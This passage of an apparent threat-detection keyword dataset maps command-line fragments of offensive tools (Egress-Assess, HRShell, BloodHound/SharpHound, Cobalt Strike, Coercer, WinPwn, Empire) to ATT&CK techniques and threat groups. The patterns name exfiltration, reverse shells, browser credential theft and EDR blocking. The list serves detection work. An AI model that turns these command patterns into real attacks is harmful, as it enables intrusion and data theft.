T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -* -client http -ip * -Datatype cc -Size * -Port * -Loop * -Fast -Verbose*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -* -client icmp -ip * -Datatype ssn -Report -Verbose*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -* -client smb -ip * -Datatype *c:\*.* -Verbose*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -* -Client SMTPOutlook -IP * -NoPing -DataType *ssn*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -* client.py -s http*:5000 --cert /*.pem*,offensive_tool_keyword,HRShell,HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.,T1021.002 - T1105 - T1059.001 - T1059.003 - T1064,TA0008 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/chrispetrou/HRShell,1,0,N/A,10,10,244,73,2021-09-09T08:26:32Z,2019-08-20T15:24:46Z -* clock-skew.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* Clone_Token /Process:* /Command:*,offensive_tool_keyword,Tokenvator,A tool to elevate privilege with Windows Tokens,T1134 - T1078,TA0003 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/0xbadjuju/Tokenvator,1,0,N/A,N/A,10,968,208,2023-02-21T18:07:02Z,2017-12-08T01:29:11Z -* cloud_enum.py*,offensive_tool_keyword,cloud_enum,Multi-cloud OSINT tool. Enumerate public resources in AWS Azure and Google Cloud.,T1596,TA0043,N/A,N/A,Reconnaissance,https://github.com/initstring/cloud_enum,1,0,N/A,6,10,1238,199,2023-07-31T07:27:37Z,2019-05-31T09:14:05Z -* cloudsploit*,offensive_tool_keyword,cloudsploit,CloudSploit by Aqua is an open-source project designed to allow detection of security risks in cloud infrastructure accounts including: Amazon Web Services (AWS) - Microsoft Azure - Google Cloud Platform (GCP) - Oracle Cloud Infrastructure (OCI) and GitHub. These scripts are designed to return a series of potential misconfigurations and security risks.,T1526 - T1534 - T1547 - T1078 - T1046,TA0002 - TA0003 - TA0008,N/A,N/A,Exploitation tools,https://github.com/aquasecurity/cloudsploit,1,0,N/A,N/A,10,2921,641,2023-09-29T16:35:48Z,2015-06-29T15:33:40Z -* cmedb,offensive_tool_keyword,crackmapexec,windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -* coap-resources.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* -cobalt *,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,0,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -* cobaltstrike*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -* coerce * --dc-ip *,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -* coerce -u * -p * --listener-ip*,offensive_tool_keyword,Coercer,A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.,T1110 - T1021 - T1020,TA0006 - TA0010,N/A,N/A,Exploitation tools,https://github.com/p0dalirius/Coercer,1,0,N/A,N/A,10,1359,152,2023-09-22T07:44:36Z,2022-06-30T16:52:33Z -* Coercer.py*,offensive_tool_keyword,Coercer,A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.,T1110 - T1021 - T1020,TA0006 - TA0010,N/A,N/A,Exploitation tools,https://github.com/p0dalirius/Coercer,1,0,N/A,N/A,10,1359,152,2023-09-22T07:44:36Z,2022-06-30T16:52:33Z -* CoffeeExecuteFunction*,offensive_tool_keyword,cobaltstrike,Beacon Object File Loader,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cracked5pider/CoffeeLdr,1,0,N/A,10,10,230,31,2022-11-07T20:56:54Z,2022-07-18T15:21:11Z -* --coin *--nicehash *,greyware_tool_keyword,xmrig,CPU/GPU cryptominer often used by attackers on compromised machines,T1496 - T1057,TA0004 - TA0007,N/A,N/A,Cryptomining,https://github.com/xmrig/xmrig/,1,0,N/A,9,10,7768,3471,2023-09-29T12:15:29Z,2017-04-15T05:57:53Z -* collect activedirectory --*,offensive_tool_keyword,adalanche,Active Directory ACL Visualizer and Explorer - who's really Domain Admin?,T1484 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/lkarlslund/Adalanche,1,0,N/A,N/A,10,1202,119,2023-06-20T13:02:30Z,2020-10-07T10:07:22Z -* --collectallproperties*,offensive_tool_keyword,sharphound,C# Data Collector for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/SharpHound,1,0,N/A,N/A,5,440,124,2023-09-28T19:43:14Z,2021-07-12T17:07:04Z -* --CollectionMethod All *ldap*,offensive_tool_keyword,sharphound,C# Data Collector for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/SharpHound,1,0,N/A,N/A,5,440,124,2023-09-28T19:43:14Z,2021-07-12T17:07:04Z -* --CollectionMethod All *--ZipFileName *.zip*,offensive_tool_keyword,sharphound,C# Data Collector for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/SharpHound,1,0,N/A,N/A,5,440,124,2023-09-28T19:43:14Z,2021-07-12T17:07:04Z -* -CollectionMethod All*loggedon*,offensive_tool_keyword,bloodhound,Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.,T1552 - T1027 - T1059 - T1087,TA0003 - TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors,1,0,N/A,10,10,8799,1624,2023-10-03T06:49:04Z,2016-04-17T18:36:14Z -* -CollectionMethod LoggedOn -Verbose*,offensive_tool_keyword,bloodhound,Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.,T1552 - T1027 - T1059 - T1087,TA0003 - TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors,1,0,N/A,10,10,8799,1624,2023-10-03T06:49:04Z,2016-04-17T18:36:14Z -* -CollectionMethod stealth*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Get-SPN.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* --collectionmethods ACL*,offensive_tool_keyword,sharphound,C# Data Collector for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/SharpHound,1,0,N/A,N/A,5,440,124,2023-09-28T19:43:14Z,2021-07-12T17:07:04Z -* --collectionmethods ComputerOnly*,offensive_tool_keyword,sharphound,C# Data Collector for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/SharpHound,1,0,N/A,N/A,5,440,124,2023-09-28T19:43:14Z,2021-07-12T17:07:04Z -* --collectionmethods Container*,offensive_tool_keyword,sharphound,C# Data Collector for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/SharpHound,1,0,N/A,N/A,5,440,124,2023-09-28T19:43:14Z,2021-07-12T17:07:04Z -* --collectionmethods DCOM,offensive_tool_keyword,sharphound,C# Data Collector for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/SharpHound,1,0,N/A,N/A,5,440,124,2023-09-28T19:43:14Z,2021-07-12T17:07:04Z -* --collectionmethods DCOnly*,offensive_tool_keyword,sharphound,C# Data Collector for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/SharpHound,1,0,N/A,N/A,5,440,124,2023-09-28T19:43:14Z,2021-07-12T17:07:04Z -* --collectionmethods GPOLocalGroup*,offensive_tool_keyword,sharphound,C# Data Collector for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/SharpHound,1,0,N/A,N/A,5,440,124,2023-09-28T19:43:14Z,2021-07-12T17:07:04Z -* --collectionmethods Group*,offensive_tool_keyword,sharphound,C# Data Collector for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/SharpHound,1,0,N/A,N/A,5,440,124,2023-09-28T19:43:14Z,2021-07-12T17:07:04Z -* --collectionmethods LocalGroup*,offensive_tool_keyword,sharphound,C# Data Collector for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/SharpHound,1,0,N/A,N/A,5,440,124,2023-09-28T19:43:14Z,2021-07-12T17:07:04Z -* --collectionmethods LoggedOn*,offensive_tool_keyword,sharphound,C# Data Collector for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/SharpHound,1,0,N/A,N/A,5,440,124,2023-09-28T19:43:14Z,2021-07-12T17:07:04Z -* --collectionmethods ObjectProps*,offensive_tool_keyword,sharphound,C# Data Collector for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/SharpHound,1,0,N/A,N/A,5,440,124,2023-09-28T19:43:14Z,2021-07-12T17:07:04Z -* --collectionmethods PSRemote*,offensive_tool_keyword,sharphound,C# Data Collector for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/SharpHound,1,0,N/A,N/A,5,440,124,2023-09-28T19:43:14Z,2021-07-12T17:07:04Z -* --collectionmethods RDP*,offensive_tool_keyword,sharphound,C# Data Collector for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/SharpHound,1,0,N/A,N/A,5,440,124,2023-09-28T19:43:14Z,2021-07-12T17:07:04Z -* --collectionmethods Session*,offensive_tool_keyword,sharphound,C# Data Collector for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/SharpHound,1,0,N/A,N/A,5,440,124,2023-09-28T19:43:14Z,2021-07-12T17:07:04Z -* --collectionmethods Trusts*,offensive_tool_keyword,sharphound,C# Data Collector for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/SharpHound,1,0,N/A,N/A,5,440,124,2023-09-28T19:43:14Z,2021-07-12T17:07:04Z -* com.blackh4t*,offensive_tool_keyword,cobaltstrike,Practice Go programming and implement CobaltStrike's Beacon in Go,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/darkr4y/geacon,1,0,N/A,10,10,1038,224,2020-10-02T10:34:37Z,2020-02-14T14:01:29Z -* --command * --output payload*,offensive_tool_keyword,pysoserial,Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,shell spawning,https://github.com/aStrowxyu/Pysoserial,1,0,N/A,9,1,9,1,2021-12-06T07:41:55Z,2021-11-16T01:55:31Z -* -command *.exe* -technique ccmstp*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,0,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -* common_pass.txt*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,0,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -* ComputerDefaults.exe*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,0,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -* -ComputerName -ServiceEXE *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Invoke-PsExec.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* ComunicationC2.cpp*,offensive_tool_keyword,DocPlz,Documents Exfiltration and C2 project,T1105 - T1567 - T1071,TA0011 - TA0010 - TA0009,N/A,N/A,Data Exfiltration,https://github.com/TheD1rkMtr/DocPlz,1,0,N/A,10,1,48,6,2023-10-03T23:06:53Z,2023-10-02T20:49:22Z -* -config modlishka.json *,offensive_tool_keyword,Modlishka ,Modlishka is a powerful and flexible HTTP reverse proxy. It implements an entirely new and interesting approach of handling browser-based HTTP traffic flow. which allows to transparently proxy multi-domain destination traffic. both TLS and non-TLS. over a single domain. without a requirement of installing any additional certificate on the client.,T1090.001 - T1071.001 - T1556.001 - T1204.001 - T1568.002,TA0011 - TA0001 - TA0002 - TA0005 - TA0040,N/A,N/A,Network Exploitation Tools,https://github.com/drk1wi/Modlishka,1,0,N/A,5,10,4434,854,2023-04-10T07:30:13Z,2018-12-19T15:59:54Z -* Configuring Windows Firewall rules to block EDR network access*,offensive_tool_keyword,EDRSandblast-GodFault,Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.,T1547.002 - T1055.001 - T1205,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/gabriellandau/EDRSandblast-GodFault,1,0,N/A,10,2,180,34,2023-08-28T18:14:20Z,2023-06-01T19:32:09Z -* ConPtyShell*,offensive_tool_keyword,ConPtyShell,ConPtyShell - Fully Interactive Reverse Shell for Windows,T1021 - T1071,TA0002,N/A,N/A,Exploitation tools,https://github.com/antonioCoco/ConPtyShell,1,0,N/A,N/A,9,817,150,2023-01-20T10:52:52Z,2019-09-13T22:11:18Z -* -consoleoutput -browsercredentials*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,0,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -* -consoleoutput -DomainRecon*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,0,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -* -consoleoutput -Localrecon*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,0,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -* -ConType bind *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Invoke-Vnc.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* -ConType reverse *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 